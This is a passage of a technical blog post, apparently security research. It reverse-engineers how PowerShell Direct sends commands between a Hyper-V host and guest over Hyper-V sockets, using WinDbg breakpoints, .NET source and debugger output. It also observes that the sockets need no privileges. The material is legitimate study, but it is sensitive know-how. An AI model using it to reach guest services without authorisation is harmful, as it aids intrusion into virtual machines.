<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ri</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="250" src="https://lh3.googleusercontent.com/bIAQFnrVICbu6LMFr3L0KQ-_7jVv9Bc38CC5LtSh54rSdZD7HFDnMbYkanX9Y3tPTv8WOCWwouwPuFltZJ44MpQsCpYGC-SXD2C2aoEfcRexgNCo3Dt16RnXABO6AoCTvIiPMHXhG2LFeZ4GAw" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="371" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Breakpoints on </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">recv</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> and </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">send </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">are set in guest and root OS for viewing of xml-messages. In a RAW format they look as follows:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="215" src="https://lh5.googleusercontent.com/IsiJgROIQY7yRIkTAvz7Ietgdtk9HhOJIJP_dARTQjr9OIE_KjB1KDaByne0E9ZYvolSs-3jLp7O9GDWp2gZZ8a-aTp6BuUm7MCBhlGutFxFaQNCRJc0G4TM_wHEb6WMfGOTugPS25gRs8avjg" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="376" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If to load WINDBG extension for debugging of .NET (.cordll - ve - u - l), then it is possible to see a stack of powershell.exe:</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="149" src="https://lh3.googleusercontent.com/5-w4O3bbD3CWu_-D64Xr5vwDepHowpp0UyWNx3DUEmQxlRviezBeMqyqqh9WBdOUg0Dt4fplJGBd6XoRpjOtrawfi3O6OZHSMCwQR4Z6vYHs0WGQM0F-1zCH_EeIkWz1dXhV3SyiWh9wMgWyYQ" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="625" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">As we see, sending is made by the SendOneItem function from the OutOfProcessTransportManager.cs module.</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="146" src="https://lh5.googleusercontent.com/vshvwfNdGpzCgMiMUI_F5jDNxHYWmpVT3DmpTSndaBlL-KescPZKvzXDtb3uylbaTSUPrzjSzOYWVfiE7CvJM1hFQDhntmO9vq9jhZAXngIr2RVVguvpQl4dFXDRsCc2jsvB8CsdVw8zI03tNQ" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="539" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Command parameter (or code in ScriptBlock cmdlet option) is coded by the CreateDataPacket function from the same OutOfProcessTransportManager.cs module</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">internal</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">static</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">string</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> CreateDataPacket(</span><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">byte</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">[] data, </span><span style="background-color: transparent; color: #2b91af; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DataPriorityType</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> streamType, </span><span style="background-color: transparent; color: #2b91af; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Guid</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> psGuid)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> {</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">string</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> result = </span><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">string</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.Format(</span><span style="background-color: transparent; color: #2b91af; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CultureInfo</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.InvariantCulture,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #a31515; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"<{0} {1}='{2}' {3}='{4}'>{5}</{0}>"</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> PS_OUT_OF_PROC_DATA_TAG, - </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Data</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> PS_OUT_OF_PROC_STREAM_ATTRIBUTE, - </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Stream</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> streamType.ToString(), - </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Default</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> PS_OUT_OF_PROC_PSGUID_ATTRIBUTE, - </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PSGUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> psGuid.ToString(), - </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">223adb3d-b639-4e84-aa83-6b193db87e1e</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #2b91af; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Convert</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.ToBase64String(data)); - </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">BASE64 текст</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">return</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> result; </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Packet header variants:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="123" src="https://lh6.googleusercontent.com/PbFq_tX0W-T-wf2TsaiE9CHaP1jmnDfqn0e63GuYnV9YTL7_y4977mQKiwPhVcizpsjN9PX_-DGlgHp1MKeF_-sCJbcddyDDpdRiH2QRY3E0eTO-DeeIvrcVkSX5IsaRMT-gIhs4V2TT_ixQoA" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="355" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For instance, if we open PowerShell Direct session and execute the command “mkdir С:\Tools\Test” in guest OS, then a text part of dialogue, will look as follows:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="90" src="https://lh3.googleusercontent.com/SrjReqhf68Pm_q0zGMcHgPkPrykPH-bds23Ao3zGOTySXbiF2Z7b7MGoUwqB0RATd_PmHCUAHHTQDH9OzLsrgTHZx55qOkbdFOp5heQ2VStyUbZE2cvTemna_MBo1KEFQ2lYZETOldicSkbIVQ" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="304" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The dialogue scheme: root OS sends several XML messages one of which contains command</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="122" src="https://lh4.googleusercontent.com/K_ZQmrA-yZjIhE6fL6VwXy65xCiCaHWnhfFyG1Evhy82ziTDwlJi8kaREovaNo-pkeMuhYD-aTx_5L4ZITztQoZUNCrsWVbsEvI6CuUtvLToJ4qwdSPpRGf8BjcyK1zwtS6JzUsyfC1fCbLTyw" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="396" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">And its arguments:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="119" src="https://lh3.googleusercontent.com/sfriuadsOeJz36NE0ubwn1OvjuPpB_iB4umn4axjI6TSq9ytJSds9KHHCN2bltHjgwTBT8E88vrhRQ71lN66lInIGcAc2OchjrdF_QVfx8pImh5nRLuvh12RjSoAX3kNmUGwP-4xOfDKfIjG2Q" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="229" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Guest OS returns several messages which contain besides servicing information results of command execution (every line of withdrawal of the mkdir command is transferred as a separate object):</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="87" src="https://lh5.googleusercontent.com/ql23EgV13j7-Ih2El3rP9E4oJFE6Af5ZfMdlZj32Rs0_GZ54FHb4WDAst1geMZxI__c17roO5GW36Y5khowtDgXi64k6cEzI3GGfxYvR9wHK_Qv1osuzCDasxoHzw4i-5OVVw5N-FTdmcXd1Ig" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="221" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="46" src="https://lh6.googleusercontent.com/v2v8m9F2CYItvT7Wshqbe5hqXD90mxWeVIYcjZ3ZS1aivI77nOVPr1TQbGYfWfNyGs8LM6uhzHbdWGo9wtz1wqbH2ct_-Q_TGixGW0JW4HVwMPMc8a4cvyNaiVLrXjaXCx23kcP4Alw0lXToYw" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="333" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="29" src="https://lh4.googleusercontent.com/KOQbqu7gDjEpodm2Nz9D24YD1DEJe-bBt3tVIA0adneXBw6FKe9_tt8qrI4CbquYj-6VXWErMIX2T1TqN645oayeeQJox-GyWEnuvG863Zm_ebKPjbEqfIoFD8Ms3J3vxbJl39aoFlkVv0O0QA" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="338" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In principle, it is possible to receive decoded data, having put the breakpoint to System.Management.Automation.Remoting.Client.OutOfProcessClientCommandTransportManager.SendData (the address can be seen using !clrstack). When we stop on the necessary point, we execute the command !clrstack – a and receive address of </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">data</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">0:020> !clrstack -a</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">OS Thread Id: 0x3b8 (20)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">………………………</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> PARAMETERS:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> this (<CLR reg>) = 0x000001e0a8459060</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">data</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (<CLR reg>) = </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">0x000001e0a84964b0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> priorityType (<CLR reg>) = 0x0000000000000000</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Размер буфера можно узнать:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">0:020> !DumpObj /d 000001e0a84964b0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Name: System.Byte[]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">MethodTable: 00007ffc081993d0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">EEClass: 00007ffc07bd4dc8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Size: 2219(0x8ab) bytes</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">When we executed </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">dc </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">in WINDBG it is possible to see message contents:</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="154" src="https://lh4.googleusercontent.com/6bzVcXd_KUIEw51Lfuf1WGjr0Cpxk67AuQZZUDNwcXIxkP4T6O8SZ3mj567VYLcHVT9yXwHJMBrFnJdSibO1upsHvNdq0kG_cNXGjg5jw7d5W4AoBCiCAy62LkRh7iY2hqRwKJFJUi0gcTosTw" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="260" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">On PowerShell Direct description page is specified that privileges of Hyper-V Administrators are necessary for using it:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="154" src="https://lh5.googleusercontent.com/eFLAp4Zf9gotDrft8qb4VjgOKu93X90U-YX2DQEt-Z4jVK5daqJ8mDaZzbEY8WjKW7PvvhTvb5B3WchBqwbfZ_AQZwp2R0WqyGCfEiq2DUxiB6OX5fXjBiLt_bjmeHm24IVqbbbEpFmTybOuPg" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="334" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Actually, these privileges are necessary for start working with Enter-PSSession cmdlet. Hyper-V sockets do not require any privileges for their work so this functionality can use in the applications started by unprivileged user.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">From root OS we can be connected to the vmicvmsession service. For that in ClientExample.exe application </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">(</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://github.com/gerhart01/HyperV-sockets</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">)</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">we will replace HV_PARENT_GUID with GUID of the virtual machine. </span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: #2b91af; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WSADATA</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> wsaData;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
